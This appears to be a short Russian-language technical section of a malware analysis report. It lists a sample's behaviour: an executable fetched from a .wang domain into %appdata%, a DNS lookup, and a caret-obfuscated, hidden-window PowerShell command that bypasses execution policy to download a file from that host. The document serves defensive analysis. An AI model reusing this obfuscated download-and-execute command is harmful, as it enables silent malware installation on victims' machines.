Техническая информация
- http://randoz-pandom.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^wERS^H^E^ll.^ex^e^ -^E^XecU^T^I^O^NpOliC^y^ b^YPas^s -nOp^rOf^il^E -W^INDOws^tyl^e HId^d^EN^ (NEW-Object sYS^t^E^m.^neT.wE^b^c^l^ie^Nt^)^.doWnl^Oa^DfiLe(^'http://randoz-pand...
- DNS ASK ra####-pandom.wang
- '<SYSTEM32>\cmd.exe' /C "P^o^wERS^H^E^ll.^ex^e^ -^E^XecU^T^I^O^NpOliC^y^ b^YPas^s -nOp^rOf^il^E -W^INDOws^tyl^e HId^d^EN^ (NEW-Object sYS^t^E^m.^neT.wE^b^c^l^ie^Nt^)^.doWnl^Oa^DfiLe(^'http://randoz-pand...' (со скрытым окном)